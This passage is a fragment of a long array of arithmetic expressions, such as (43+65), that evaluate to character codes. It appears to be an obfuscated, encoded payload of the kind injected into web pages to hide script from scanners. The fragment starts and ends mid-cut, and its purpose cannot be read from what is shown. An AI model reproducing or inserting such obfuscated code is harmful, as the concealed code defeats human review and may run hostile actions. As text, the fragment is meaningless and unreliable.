22),(88+ 6),(43+ 65), (65 +34), ( 71 + 5), (57+15),(76+ 23),( 79-1),(99- 15), (7+86),(12+ 92), ( 12 + 87),( 33 +43),(47 + 79), ( 73 + 26),( 25+47),( 46+ 38),( 27+66), (81+ 23),(27 + 72), (71 + 5), (61 +65), (72 + 24), ( 58-36),( 57+ 27),( 55+ 38), (79 -13),(27 + 72), (27+ 49),(65 +61),( 87 +9), (13 +10), ( 15+ 69),( 20 + 73),( 62 +8), ( 45 +54), ( 56 + 32),( 29+81),( 19+77), (98 -10),(36 +48), ( 15+79),( 82 +18),( 88 + 11),( 58+30),(82 +6),( 11 + 88),( 69+ 4), ( 34+ 50), ( 64 + 30), (50 +50), ( 7 +92),88, (32+94),(97-1), (1 +84),( 96 - 12), (57+36), (41+75),(88 + 11),( 22 + 69), ( 38 + 72), ( 0+ 99),( 58 +21), (89 -5),( 6+88),(30+ 90), (14 +85), (77+2), ( 90-18),( 67 +32), ( 43+29), ( 33 +51),(33 + 61),(82+ 30),( 59 + 40), ( 32+ 59), (78+ 32), ( 40 +56), (80 - 57), (64 +20),(82+ 11), (55 + 19), ( 60 + 39), ( 35 +44), ( 62+64),(0 +99), ( 79- 6),(11 +73),( 33+ 61), ( 91+21), (45+54), (91 - 3), ( 51 +21),( 20+ 76),(58- 42),(83 +1), ( 67 +26),( 95+ 5),( 58 + 41), ( 24 + 64),( 47+ 63), ( 66+ 30),( 81 - 59),( 57 + 27), ( 20+73),(55+65),( 9 + 90),(6 +84),(49 +23), ( 89 +7),( 82- 63),( 48 + 36),( 15+78), ( 66 +46),(6 +93), (77+ 13), (84 -12),( 55+ 41), ( 49-31),( 70+ 14),(81 + 12),(68 +48),99, ( 45 +34),(2 + 86), ( 29 + 67), (25+ 63),(28 + 56), ( 20 +74), ( 83 +29),(10 +89),(85+3),(98 + 28), ( 54+42), ( 97 -6), 84,( 81 +12),(75 +29), ( 78 + 21),(33+ 55), (71 + 39),( 40 +56), (57 +28), (62 + 22), (57 + 37), (20 +80), (30+69), ( 28 + 51),(42+84), (37 +59), (31 + 60), ( 79+ 5),(33+ 60),(55 +61),(54+ 45),(29+ 62), (19 +107), (95+1), (19 -3), (51+33), ( 36 +58),(94 +10), (40 +59),( 1 +75), ( 65 + 7),( 85 + 11), ( 97- 78),(33 + 51),( 97- 4), (47 + 49), (34+65), (1 + 87), ( 99- 11), (38 + 61),(87- 9),(72 + 12),(16 + 77),(37 + 83),(37 +62),(68 + 11),( 80+ 46), (97 - 1), (5 +14),(62+22),( 24 +69),( 42 + 70), ( 40+ 59),( 2 +88),(100-12), ( 62 + 37),(65+ 10),( 27 + 57),( 30+63),(19 +93), ( 2+97), (48+40),(91- 3),(67+ 29), (70- 53),(96- 12), (96 - 3), ( 30 +86), ( 81 +18), ( 67 + 9), (42 + 68), ( 12 +84),(58-40), (7+77),(10+ 84),( 77+ 39),( 31+68),(66+10), ( 94+ 16), ( 18+ 78), ( 66-50),(83 + 1), (55 +38), ( 73 + 31), ( 98+1), ( 17+74), (46 +64), ( 50+ 46), ( 27- 10),(14 +70), ( 65+ 28), (43 +69),(93+ 6),( 34+ 57),(57+ 53), ( 26 +70),( 71-54), ( 22 +62), (23+ 70),( 38+ 70),( 71+ 28), (88- 9),72, (19+77), ( 21+ 2),( 58+ 26), (20+ 74),( 89 + 23),( 30+69), ( 98 - 10), ( 98+28), ( 89 + 10), ( 48 +30), (20+64),(92+ 1), ( 23 +77), ( 77+ 22),( 52 +38),( 48 +24), ( 58+41),( 64+9),( 46+ 38),(4+89),(25 +87),( 6 +93),76, ( 57+15), (73 +23), (18 +5), (10 + 74),( 66+28),(82+ 26), ( 75 +24), ( 38+53),(32 + 56),(77 +22),( 3 + 76),(32 + 52),( 26 + 68),( 70+ 46),(59 +40), (27 + 49),( 22 + 104), ( 36 + 60),(80 + 10),84, ( 78 + 15),( 73+39),(42+57),( 69 +10),( 100+26),( 87 + 9),( 41 -18), (32 + 52),(41+ 53), ( 44 +72), ( 3 +96),( 61+29),( 53 + 35), (56 + 43),(68+ 7),(45+ 39), ( 89+ 4), (67 -1), ( 56+43), ( 13 + 75),(15 +57), (49 +50),(4 +75),( 81 + 3),(59+ 34), (75-5),( 92+7), (54+37), ( 16+94), ( 20+79), (56+ 17), (63 +21), ( 31 +62),(37+ 59),( 92 +7), (5 +86),(72 + 54), (51+ 45), ( 98-13),(64+20),(11+ 83), (95+ 17),( 98+ 1), (46 + 45), (81+45),( 100 -4), ( 25-7), ( 45 +39), (47 +46),( 88 + 16),( 36 + 63),(27 +49), ( 83+27), ( 81 + 15), (43 - 25),(58 + 26),(11+ 82), (83+13),( 84 + 15),(14+ 77), (1 + 125), ( 34 + 62),( 56 +29), (100 - 16),( 71 + 22), ( 26+40), ( 48+51), ( 63 + 28), ( 61 + 65),( 4 +92),( 87 - 71), ( 37+ 47),( 65 +29),(30 + 74),( 2 +97),(24+ 67), (60 + 12), ( 46+53),( 50+28), 84, (36+57), ( 94+22), (83 + 16),( 14+ 76),(7+ 65), ( 3 + 93), (97 - 7), (45+ 39),( 15 + 78), ( 49+21),( 52 + 47), ( 51+ 28),( 93 -5), (96 +3), ( 87-15), ( 19+65),(65+ 29),( 83 + 21), (32+ 67),( 39+ 49), ( 4+84), (21+ 78),( 44+ 31), (83 + 1), ( 15+78),( 78- 8), (60+39),( 84 -5), (30+ 42), (100 - 1),(37+37),(89- 5),(6 +87),( 61+13), (63+36), (13+78), (22 + 88),(50+49),79,( 54+ 30), (4 +90),(98 +14),(16+83), ( 60 +16),(67+ 59), ( 35 +61), (41 - 19),(2+ 82),(59+ 35), ( 66 + 46),( 4+ 95), ( 6+82),( 21 + 51),( 50+49),( 27 + 52),( 100- 16), ( 52+41), (6 + 106), (53+46),(0+ 76),(96 +30),(6+90), ( 93- 76),( 97-13), (32+ 61),(36 +72),(51+48),( 87 +4), ( 43 + 45), (63+33),(95 -72), (68 +16), ( 21+ 73), (32+ 84),( 55+44), ( 53 + 23), ( 35+91), ( 73+ 26),( 61+ 13),(97-13),( 27+67), (18 +102),(50+49), (40+ 48),(56 + 32), (55+44), ( 11 + 67),(97 - 13), ( 83+ 10), ( 61+13), ( 88 + 11),(99 - 9), (2 + 70), (90 +9),(72+ 3), ( 6+ 78),(77+17), ( 46 + 74), (48 +51), ( 49 + 30),(28+98), (39 + 60),(21 +54), ( 0+ 84), ( 43+ 51),(36 + 76), ( 78+21),(16+ 75),(67+ 43),(57 + 39),(18+4),( 70 + 14),93, ( 16+ 84), (31+ 68), ( 32 +44),(94+16), (97 - 1),( 58 -39), ( 90 -6),(61+ 32),( 4 +112), ( 90 +9),(40 +36),( 10 +62), (91+8),(15+ 60), (31 + 53),( 97 -4), (38 +28),(6 + 93), (8 +80), (35+75),( 93 + 3), (99- 83), (0+84), ( 70+ 24), (47+ 57), ( 65+34),( 16+63), ( 99- 11),(60 + 39), (79-6), ( 99- 15),( 46 + 47), ( 59+53), (75 + 24), (98 - 10),(47+ 79), (12+87),( 98 - 26), (60+24),( 96-3),( 0 + 66), ( 45+ 54), (67+ 12), (7 +65),( 23 +73),( 94 -72), ( 53 + 31),(9 +85), (97+7),( 71 + 28),(100-9),( 14+ 112),( 14 + 82), (41-19),( 39 +45), ( 7 +86), (61+ 5), ( 94 + 5),( 77+ 14), ( 97-9), ( 39 +60),(41+ 34),( 8 +76), (97 - 4),( 49+ 25), (71 +28), ( 74 +14),( 17 + 55),(30 + 69),(63+9),(78 + 6), (2+ 91), ( 41+79),( 81+18),( 3 +88),(7+ 119), (58 +41),( 68 +11),(29+55), ( 4+90), (58+ 46),(11 + 88), ( 47 +43),( 17 + 71),(36 +60),(90+1),( 16 +68), (66 + 28),( 88+24), (47 + 52),(31 +60),( 31+ 79),(43 + 53),( 31 -15),(36+ 48),93,(73+39), (21 +78),( 34 +45),( 64+ 8),(11 +85),(2+ 83),(27 +57), ( 85 +9), (51 +61), ( 67 +32), ( 42 + 49), ( 54 + 34),(24+ 75), (84 -10), (73 +11),(44+ 49), (30+ 82), (34+65),( 30 +61), ( 68+ 20),96, (99- 83),(52 + 32),(81 + 12),(4 + 92), (24+ 75),(70 +9), ( 32 +40),( 77+ 22),( 84 - 5), (30+54), ( 76+ 17), (30 +66),(54 +45),( 30 +46), (67+43), (90+ 6),(64 +26),(10 + 74), ( 5 + 88),( 30 + 70),( 12 + 87), (63 +25), ( 81 +29),( 37 +59),( 51- 34), ( 12+72), (74 +20),( 0 +112),( 72 +27), ( 33+57), ( 0+ 72), ( 64 +32),(79 - 63),( 68+ 16), ( 84+ 9), ( 72+ 40),(91+ 8), 79, (44 + 44), ( 23 + 76), (81 - 7), (61 +23), ( 53+40), ( 16 +100), ( 16+ 83),(67 +12),( 96 + 30),(2 +94),(55 - 32), ( 30+54),(48+45), ( 0+ 108), ( 62+37), (53 + 35), (81+29),( 12+84),(10+ 7),(27 +57),(44 + 49), ( 32+ 34),(83 + 16),( 2 +86),(28 + 98),(15+81),(35 - 18),( 81+ 3),(20 +74),(51+ 61), ( 79+20), (27+52), ( 74 -2),(19 + 80),( 84 -11),( 93- 9), ( 74+ 19),(43 +27),( 3+ 96), (41+35),(73 +37),( 35+64), (80- 8),( 66+ 18), ( 30+ 63), ( 77 - 3), (55 + 44),( 12 +64), ( 8 +118), ( 13 + 83), ( 18+4), (41+43), ( 63+30),( 57+51),( 22 + 77),(51 + 25), (28+82),( 30 + 66), (52 - 35),(47+ 37),(13+ 81),(44 +76), ( 13 + 86), (74+17), (67+ 43), ( 69+27), ( 73 - 57),(8 + 76),( 40 + 54),( 20+100),( 84 + 15),( 6 +73), ( 37+ 89), (46 + 50), (81 -62), ( 52+32), ( 23 + 70), (35 +81),( 77+22),( 22 +68), ( 60 + 12), ( 57+39), ( 93 - 76),84, (2+ 91), ( 57 + 51), (5 +94),(38+52), (46 +26), (98+1), ( 30 +43),( 48+36), (35+58),( 82 + 18), (58 + 41),( 93 - 5),(82 +28),(24 +72),( 8+ 82),(23+61),( 73+21), ( 54 + 62), (19 + 80),(16+ 60),( 72 +54), ( 66+ 33), (17+62), ( 67+ 17), (56+38),( 24+ 80),(98 +1), (34+ 42), ( 29 + 97),( 15+ 84),(57 + 21), ( 16 +68),(78 + 16),(20+92),99,(11+77), ( 28+ 98), (81+ 15),( 70-48),( 36+ 48), ( 56+ 37), ( 23 + 97),( 15 + 84), ( 99 - 11),(65 + 7), (32+ 67),( 50 + 22), (58+26),( 42 +52),( 99+ 21), ( 81 +18),( 60+28), (33+ 39), ( 94+5), ( 98 - 24),( 82 + 2),(30 + 63),(32+ 88), (23 +76), (83 +8), ( 8 + 80), (33 + 66),(29 +43),( 0 + 84),(16+78),( 86 + 34), (67+32),( 23 + 53),(1+125),(85+11), (32 -16), ( 38+46),( 96 -2),( 37+71), ( 83+16), ( 35+ 41),( 87 - 15),( 98- 2), ( 28 - 5),( 30+54),(80 +14),(8+ 112),( 78 + 21),( 25 + 65), (74+ 14),(79+ 17), (40-24),(77 + 7),(50 +44),(53+59),(59+ 40), (13 +63),(74 +36),(95 +4), ( 72 + 3),(14+ 70), (44+ 50), (12+88),(4+ 95), ( 19+ 69), ( 80 +30), ( 38 +58), ( 30-14), (52 + 32),(15 + 79),( 31 +73),(49+ 50), ( 26 + 53), (4 +68), (73+ 26), (94 -16),(79+ 5),( 90+3), ( 97 -23), (57+ 42),(50 +40), ( 75- 3),( 86 + 13),( 51 + 22), (97-13), (71 + 22), ( 77 +35),( 13+ 86),( 49 + 30),( 71+ 55),( 46 + 50),( 88- 66), ( 83+ 1), ( 47+46), ( 82 -8),( 24 +75), ( 80+10),(3 +69),( 24+ 72),(7+ 16),(63+ 21), ( 60+ 34), (76 +32),( 91 + 8),(93 -5),(64 + 24),( 82 +14), (4+19), (99- 15), (13+80),( 88+ 24), ( 22+77),( 84 +6), (64+ 8), (65 + 34), (22 +56),(31 +53), ( 98- 5),( 81 + 15),(54+ 45), ( 45+46),( 8+ 102), ( 7+92), (17 +57), (21+63), ( 43+51), ( 22+ 94),(73+26), ( 16 +60), ( 26 + 46), ( 68+ 31),( 63+ 12),(7 + 77), (44+ 49), ( 84-10), (37+62),(94-6),(22+104),(73 + 23),( 29- 6),( 3+81), ( 97- 3), ( 44 +60),(16+83), (93- 2),(92 - 4), (43+53), (26 + 64),( 12 + 72),( 31 +63),( 12+ 88), (7+ 92), ( 69 + 10), ( 22 +66),( 88 +11), ( 92- 17),(52 + 32),( 13+80), ( 63 + 37), ( 81 + 18),( 13 + 63), (39+ 87),(98 -2),( 68 -51), ( 5 +79), (27+ 67),( 0 +100), ( 85+ 14), ( 90 -14), (95 + 31),( 88+ 11),(78 - 6), (18+66), ( 30 + 63),(73 -7), ( 71+28), ( 83 + 5),(18 +70),( 44+52),(9 + 7), (18+66), ( 15 + 79),(12+ 88), ( 89 +10), (95- 5), ( 11+61),(11+ 85),(23- 5), ( 39+ 45),( 5 +88), (66 +8),( 41 + 58), ( 5 +85),(32 +40),(48 + 51),( 59 +20), ( 86-2), (76 +17),(62+ 46),(55 + 44), ( 75 +13), ( 72 + 38), ( 60+36), ( 46 -28),(26+58),(4+ 90), (26+ 94),(6+ 93), (37 + 42), (71+17), (89 + 10),( 95-22), (83+ 1),(77 +16),(37+ 59), (19 +80), ( 15 + 76), ( 10 +78), ( 69 + 27),(41-25), ( 12 +72),(81+12), (18+48), (53 +46),(74+ 17), (80 +8), ( 6 + 90), (2+ 83),( 81+ 3),(95-2), (0 + 104),(81 + 18), ( 86-10), ( 24 + 86),(5+ 91), ( 72 -54), ( 65+19), 93,(46+ 28), ( 16 +83),(28 + 60),( 12+76),( 15+ 81), (80 - 63), ( 34 +50), (64+30),(1+119),(83+16), (56+35),( 54+ 72),( 45 + 51),(59 + 32),(57 +27),(69 +24), (18+ 52), ( 89 +10), (38+53), (68+20), ( 29 +67),( 7 + 9), (47+ 37),(34+ 60), (41+ 59), ( 95 +4),(94-6), ( 89+ 37), ( 32 + 67), (40+ 38), (70+14),( 7+ 86), (7+ 113), (49 +50), 90,( 1 + 87),( 47 + 49), ( 24 - 2), (20+ 64),( 45+48),(7+ 109), (3 + 96),(98 -22),( 42 +84), (36 +60), ( 4+81),( 86 - 2), (20 + 74),( 47+53),(42 + 57),( 41 +38),(91 + 35), (84 +12), ( 53+ 32), (3 +81), (22+ 71), (54 +12), (71+ 28), (17+ 59),(75-3),(32 + 64),( 38-16),(92- 8), (99-6), ( 91 +9),(26+ 73),( 92-4),( 64 + 8),( 79+ 17),(28- 11),(23+61),( 12+ 81),(31+65),(75+ 24),( 42+ 46), (88 +22),( 3 + 93), ( 76-57), (81+ 3), (47+ 46),(63+7),( 37+62), (57+31), ( 100 + 10),( 74+22),(29 +59),(89 - 5),( 97 - 4),(98 + 22), 99, (98-19), ( 53 + 35),(88 + 8), ( 34-18), (88 - 4), (82+11),( 56+ 64),( 16 +83),( 100-12),(97 - 25),( 61+ 35),(63- 46), (66 + 18), ( 50+ 44), (83+ 17),(89+ 10),( 30+ 46), ( 27+ 83), (69 + 30), ( 95 - 21),( 87-3),( 100 - 7),(72 +44),(16 + 83), (35+44),( 48 +40),(88 +8),( 80 +10), (5 + 79), (87+ 7), (75+33),( 26+73),(35+41),( 84+ 26), ( 27+69), (21- 4),( 91- 7),(20 + 74), (40 + 72), ( 44+55),( 3+88), ( 58+68), (99-3), (70-52), ( 72 +12), 94,( 65+35), (30+ 69), (21+70),(19+107),( 65 + 31),(41+ 47), (40+44), (0+ 93),( 64 +52),(60 +39),( 67+ 23), (4+ 68), (85 +11), (57 + 31),(70+14), (77 +17),( 21+ 87), ( 69 + 30), (34 + 45),(72+54),( 27+72),( 52 +22), ( 8 +76), (17+77),(22+ 78),( 48 +51),(39 + 49), ( 91 - 19), (49 +47),(3+20),( 32 + 52),(77 +16),(50+50), ( 33+66),( 42 +37),(86+ 40), (62+34),( 78+ 12),( 0 + 84), (84+ 9),( 20+50), ( 57 +42),( 67+ 12),(96 -24),(63+33), ( 39 + 52), (71+ 13), ( 29+64),( 19+ 89),(64+35), (97-6),(85-13), (0+96), ( 70-54),( 20 + 64), (70+24), (72 +36), ( 62 +37), (58 +30),(5+ 83), ( 30 + 66), (99 - 81),(58 +26),(88+5), (38+70),( 23+76),( 92-4),(31+57),(63 +33),( 16 +72),(83 +1),(53+41),( 90 + 26),(56 + 43), (79+ 9),(0+ 72),( 69 + 27),(88 -70),84, (36 +57),( 55+65), (38 +61), (32 +58), (41 +47),( 16 +83),(43 + 30), (24+ 60), (14+79), (29+41), (3+96), ( 41+38),(38+34),( 20 + 79), ( 27+46), (53+ 31), (32+62),(15+ 105), ( 63+ 36), (1+ 90), ( 34 + 76), (53+46), ( 58+ 20), ( 57+27), (27+66),( 77+ 39),(67+ 32), ( 26 +53),(82+ 6),(64 +32),(67+ 23), ( 46+38),(64 +30), ( 59 + 45), (34+65),(63 +25),(70 +2),( 8 + 88), ( 48 - 31), ( 45+ 39), ( 46+ 47),( 96 + 4),(8 + 91), (67+12), ( 26+ 100), (71 + 25),(3 + 15),(92 - 8), (61 +32),( 20 +100), ( 12+ 87),(99-9), ( 80 - 8),( 8 + 88), (82+6), (70 + 14),( 61+ 33),( 92+8),( 51+ 48),(37+51),(13+113), (64 +35),( 91 - 13),( 78+ 6),( 30+ 64),( 6+ 106), ( 65 + 34), (71 + 8), (10+62),( 98-2),( 13+77),( 92 - 8), ( 70 +23),(52 + 18), ( 89 + 10), ( 92 - 13),(4 + 68), ( 94+2),( 29-12),( 11+73), (93+1),( 62+42),( 21+ 78),( 57+ 31), ( 96 +14),( 31 +65),(42 - 19), 84, ( 49 +45), ( 80 +20), ( 41 +58),( 23 + 53), (15+ 57),( 26+ 73), (16+ 59),( 9 +75), ( 36+57), ( 11 + 85), (49 +50),( 79 +11), (58 +14),( 73+ 26),( 33 +45),( 46 + 38),(79+ 14),( 8 + 58),(98+ 1), ( 74 + 14),( 97-25),(89+ 7), ( 1 +15),( 95 - 11), (18 +76),(24+96), ( 96 + 3), ( 27 + 64),( 20 + 68),( 95 +1), ( 52-35), ( 23+61), ( 66 +28), ( 30+ 90),( 69+ 30),(86-7),(60+66),(19+ 80),( 60 + 12),( 94 -10),(82 + 12),( 63+ 37), (16 + 83), (44 +44),( 56+54),( 29 + 70), (70 +2),(6+ 78), (47 + 46), ( 75 + 29), (17+82),( 2+77), ( 23 + 103),(32 + 67), (7 +68), ( 57 +27),( 99- 6), ( 53+21),(74 +25), (69+ 7), (42+ 68),( 51+45), ( 45-29), ( 64+ 20), ( 94 -1), ( 27+ 43), (98+ 1),(41 + 35), ( 81 + 45), (68 +28),(50 +41),(41+ 43),(30+ 63), (2+64),(50+49), ( 19+72), (25 + 47),( 40+ 59),( 5 + 74),(68 + 16),( 53 +40),(21+ 91),(21+78), ( 71 + 5),( 35+ 91),(51+ 45), (77+ 11),(69+15),(89+4),(85 -11), ( 68 + 31),( 27+52), ( 75+13), (90+9),( 49 +26),(33 +51),( 54+ 39), ( 88 + 8),( 48+ 51),(23+ 65),( 23 +103),(34+ 62),(94 -78),(14+ 70),(85+8),(95- 29), ( 61+38),(77- 1), ( 56 +54), ( 91+ 5), (93-70),(73+ 11),(50 +43), ( 79+25),(6+ 93),(100 - 9),( 29 +81),( 94+2), (24-8),(59+25), ( 18 + 75), ( 62 + 54), ( 72+ 27), (88+ 2), (11 +77), (46+ 53), ( 100- 22),( 78+6),(26+67), (46 +58),(94+ 5), (58+33),( 73+53), ( 92 + 7), (2 + 76),(100-16), ( 18 + 75), (7+ 97), ( 83 +16), ( 0+79),( 24+ 64), ( 15 + 81),(3 +85),(81 + 3),( 25+68), (17 +57), (41 +58),(82+8), (53+35), (52+ 47), (45+ 34),( 3 +81), ( 65+ 29), ( 27+81), (75 +24),( 100- 9), (52 +36), ( 6 + 90),(29 + 56),(32+ 52),(55+38), ( 55+ 53),(17+ 82), ( 24+67),( 80+46),(48 +51),( 49+ 24),( 6 +78), (5 + 89),( 58 +50),99,(80+11),(44+ 82),( 43+53), ( 22+66), (45 +39),(75+19), ( 9 + 111),(48+ 51), (46 +45),(75 - 3), (7 + 92),(43+ 35),(18 +66),(86+ 7), ( 22 + 94),(49+50), (53+26), ( 89- 1),( 84 +15), ( 83 -11), ( 76 +8),( 43 + 50),( 64 +44), ( 48 + 51),(94 -6), ( 81+ 7),( 82 + 14), ( 32 +53),( 19+ 65),(28 +65),( 50+24),( 35+ 64),( 98- 22), (63 + 63),( 94+ 5),( 99-20), ( 69 + 15),( 12+ 81), (30+ 82), ( 18 +81), (47 +43),( 34+54), (0+96), ( 70- 48), ( 95 - 11),( 18 +75),(92 +4),(10+89),(35 +41),(36+36),( 14+82),(70 +21),(85 -1), ( 7 +86), ( 19+ 77), ( 48 +51), (29 + 61), 72, (40+ 56), (9+ 76), (26+ 58), (81 +12), (79- 13),(0+ 99), (74 + 2),(95- 23), (29+67), ( 28 +63), (64 +20), (92+ 2), (74+ 34),(17 + 82),(43+ 48),(48 + 40), (100-4), (63 - 40),( 23+ 61),(70 + 23), ( 98- 2),(74 + 25), ( 42 + 46),( 97+ 13),( 67+32),(24+ 51),( 93 -9),( 3+ 90), ( 15 + 101), ( 34+65),(17 + 74), (31+41),(18+78),(92 -76), (96 -12),(30+ 63), (79+41), (4+ 95), ( 4+72), ( 22+88),(73+26),( 38 + 35), (79+ 5), 94,(35+ 65),(35 + 64), (97 -7), (100 -28), ( 62+34), ( 61 - 38),(22+62), ( 93 +1),(77 + 43), ( 98+ 1), ( 53 +35),( 90+36),(20+ 76), ( 51 - 33), ( 15+ 69), (67 +27),( 87+ 21),(89+ 10),(17 + 62),( 45+81),(68+31),(47 +26), ( 50+34),( 18 +75), (22+48),(49+ 50), (56 +20),( 50+ 76), ( 68+ 31),( 41 + 31),( 35 +49),( 25 +68),( 5+ 91),( 38 + 61),( 92- 1),( 40+32), ( 89 + 7), ( 80 +8),(89 - 5), (70 +23),(34+ 86), (57 + 42),(44 + 35),(21 +105),(23 + 73), (90 -68),(70+ 14), ( 49 +44),(84+12),(92+ 7), (22 + 68), (21+ 67), (43 +56),(45+27),( 60 +24), (25 + 68),(24 +88),(78 + 21), ( 25+54), 72, ( 15 + 81), (81+10), (2 +82), (29 +65),(3 +117), ( 87+ 12), ( 79+ 11),(13+75), ( 82 +14),(9 + 10),( 82+2),( 79+14),(87+ 17),(94 +5),(29+59),( 12 +76), (81 + 15),(48 -30), ( 21 +63), ( 95 -1),( 100+ 20),( 29+ 70),( 99-11), ( 31+ 57), (29+67),(4+ 81),( 45 + 39),( 83 +11), ( 91+25), (61 +38),( 53+ 23), ( 45 + 81), ( 57+39),(2+83), ( 5+ 79),(34 + 59),(99+ 17), ( 33 +66),(62+26), ( 69 + 19),( 41 + 55),( 71 + 20), (68 +16),(39+54), (31+ 73),(81 +18), ( 66 +22), (29 +97), ( 57 + 39), (10 +9), (0 + 84), ( 8 +86), ( 41 + 67), ( 92 + 7), ( 15 +61),( 3+69),(72 +27), ( 74 +4),(92 -8), ( 10 +83),( 53 +67),( 45+ 54), (69+ 19),( 34+ 92),(74+22),( 92- 2), (66+ 18),(97 -4), (17 + 91), ( 58 + 41), (39 +49),( 44 + 82), (87+12),(52+ 21),(79 + 5),( 65+ 28), (46 +24),( 95 +4),( 69+ 22), (36 + 36),(42+ 57),( 20+52),(81+ 3),(0+ 93), ( 60+ 52), (74+25), (26+ 62), ( 48 +24), (59+ 37),(98 -10),( 57 + 27),(58+ 35), ( 88 +8), (61 +38), ( 28 + 62), ( 1 + 71), ( 83+ 13), ( 41 -25), 84, (34+ 59), (87+ 9),(59+40),( 60+16), (19+ 53),(29+70),(24 + 48),(95 - 11), ( 53+40),( 33 +75), ( 48+ 51), ( 16 +60), (10+62), (9+ 87), (27 - 10), ( 45+ 39),(77 + 16),(36 +76),(89 +10),( 55+36),(56+32),(75+21), (88 -3),(0+ 84),(1+93), (46 + 74), ( 35 + 64), ( 57+31), (20+68), (20+79),(85 - 13), (7+77),(98-4), (0+112),(63+ 36), (0+ 88), ( 26 + 46), (94+2), (65 -42), ( 15 + 69), ( 79 + 14),(75 +25),( 36+63),(66 +10), (49+ 77),( 9 + 87),(48+43),( 54+ 30),( 11 + 82),(11 + 55),(77+22), (30+ 61),(95- 23),( 75 +24), (61+18),(59 +25),(72+ 21),(60+ 48), (80 +19), (53+38), ( 92 -20), ( 95+1), ( 32 +59), ( 9+ 75),(5+ 88), ( 55 + 15), (22 + 77), ( 2+86), (60 + 12), ( 52 +44),(20 - 2),( 12+ 72), (56+37), (56+10), ( 47+ 52), (46+30),(72+ 54), (23+ 73), 22,( 97 -13),( 79+14),(51 +69),(49 + 50),(9+79),( 6 + 66), ( 34+62),(61 + 24), ( 87- 3),( 79 +14),(86+22), ( 29 +70), (95 - 19), ( 71 + 39),( 46 +53), (20+53),(21+63), ( 25+69), ( 14+ 102), ( 34 + 65),( 20 +59),( 72 +16),( 50+ 46), ( 33-16), ( 65+ 19),( 49+45),(14+94),(10+89), ( 19 + 71), ( 87-15), ( 74 + 22), (94- 72),( 94 -10), (84+10),( 63+37), (70 + 29),(21+58), ( 63+25),( 60 +36), (46+42), (95-11), (55+38), ( 4+66), ( 18 +81), ( 13 +63), ( 9+ 117), ( 52 +47),( 28+50), (21+ 63),( 56 +37), ( 62 +8), ( 45 +54),( 62 + 17),( 52+ 20), (14 + 82), ( 24-1),(29+55), (81+12), ( 20 +100),(86+ 13),( 13 + 78),( 73+15),( 56+40),(55- 33),(41 +43),(0 +94),( 5+ 99), (26 + 73),(81- 5), ( 23+103),( 97 -1),(86 -67),( 43 + 41),( 69+ 25), ( 90 +22), (13+ 86),(14 +65), (84 +42),(58+ 41),( 22 + 53), 84, ( 5 +89), ( 51+65),( 30+69),(0 +91),(11 +115), ( 19 +77),( 27 -4),(38+46),( 87 +6),(80 +32), (79+20), ( 91-3), (73+15),( 79 + 20),( 26+ 53),(79 +5), (10 + 83), ( 79+ 29), (96 +3),( 51 +40),( 76+ 12),(99- 3), (34+57), (75+ 9),(56 + 37), ( 64+44),( 1+98),(1 + 75), ( 99+27), ( 52+ 47),( 59+ 20), ( 46 + 38), ( 70 +23),( 8 + 92),( 1+ 98),(92-4),( 90 +36),(0 +99),( 46 +26),(76 + 8),(40+ 54), ( 41 + 67), (4+ 95), (60+ 30),(43+29),( 59 +37), (99- 76),( 18 +66), ( 78 +16),(43+69),(85 + 14), (34+ 45),( 29+ 43), ( 77 + 19),(58- 41), ( 92 - 8),(58 + 36),(83+17), (74 +25),(51+ 37),( 7 + 119), ( 4 + 92),( 88-69), (8 + 76),( 46 + 47), ( 80-6), (64+35),( 12+ 67), (21+51),(15+84), (30+ 44),(13+71), (41+ 52),( 86+ 34),( 92 +7), (32+56), (12+ 114),( 8 +91),( 6 + 72), ( 8 + 76),(35+ 58), ( 99+ 13), ( 48 +51),(88 + 3),( 16+110),(0+ 99), (96 - 21),( 50 + 34), (78+ 15),( 38+74),( 79+ 20), (90 -11), (51+37), ( 52+47),( 9 + 63), 84, (11+ 82),( 65+ 51), ( 39+60),( 27+ 61), ( 35+ 53), (41 + 55),( 1+87), ( 52 +32), (54+40),(58+ 46), ( 89+10),( 60 + 30), ( 19 +53),(19 + 80),( 5 + 70),(33+51),(81+12), ( 16 + 96),( 43 +56), ( 55 +36),( 12 +76), ( 19 + 80), (67 + 5),( 100 -16), (8+ 86), (55+65),(40 + 59),(0+91), ( 22+ 66), (93 +6),(92-18),( 99- 15),( 68+26),(99 +1), (34 +65),( 28+60), ( 47 + 79),( 44 +52), ( 50 +40),(8 + 76), (71+22),(94-28),(4 + 95), (30 +61), ( 77 + 49), (49+ 47), (7 +15),( 86 -2), (12+81), ( 53+63), (85+ 14),( 88 + 3),(61+ 65), (96+3),(7 +68), (42+42),(64 + 30),( 68 +48),(22+ 77),( 87 - 11), (45+ 27), (48 +48), ( 99 -76),( 88 -4),(99- 5),(38 +78),( 23 + 76), (70 +20),(73 +15),(47 + 49), ( 50 +38), (82+2), ( 77+ 16), ( 89- 19), ( 42+ 57), ( 84+4),( 49+ 39),( 18 +78),( 12 +73),(46 +38), (90+3), (59 + 49),(44 + 55),( 73 +18), (5+ 105), ( 61 +35), (60+28),(76 +8), ( 98-5), (86 - 16), ( 78 +21), (6+ 82),( 40+ 70),(4+ 95),( 34 +40), ( 22+ 62),(5 +88),( 59+41), (100 -1), ( 65+14),( 25 +101), ( 16+80), ( 24 - 8),(3 +81), ( 62 +32), ( 11+109),( 34+65),( 29+62), (81 - 9), (63 +33), 23, ( 9 +75), ( 10 + 84),(90 +10), (18 + 81), ( 66+ 24),( 47+25),(19 +80),( 8+ 67),(67 +17),(48 + 45),(25 +49), (63 + 36), 88,(20 + 52),( 76 + 20),( 57 +28), ( 32 +52),( 87+7), (9 +95),( 85 + 14),(76 +12),(7+ 65),( 40+ 59), ( 84 - 12),( 15+69), ( 71+23),(18 +86),( 47 + 52),( 67+ 23),( 96 -24), (70 +26),( 15 +70),( 82+2),(11+83), (28 +92), (43 + 56),( 23 +56), ( 96 - 24),( 48 +48), (43 + 42),(86- 2),(89 + 4), (78+26), (88 + 11),( 44+ 35),( 39 + 33),(52+44),(58-42),( 22 + 62),(63+ 31), ( 80 + 24), (70+29),(17+62), (81 -9), ( 69+ 30),(22+56), ( 72 +12),( 28+66), ( 76+ 32),(61+38), (90 - 11), (91- 19),(16 + 80),(67-45),(31+ 53), ( 0+ 93),(77 + 31), (100 - 1),(88 - 12), (52 + 74), (27 + 69), ( 3+ 85),(50+34),(36+ 58),( 73+ 47), (71+ 28), ( 47 + 44), ( 67+5), ( 51 + 48),(7 +71), (24+60),( 71 + 23),( 85+35), ( 38+61), ( 67+9), (77-5),(10 + 86),( 30- 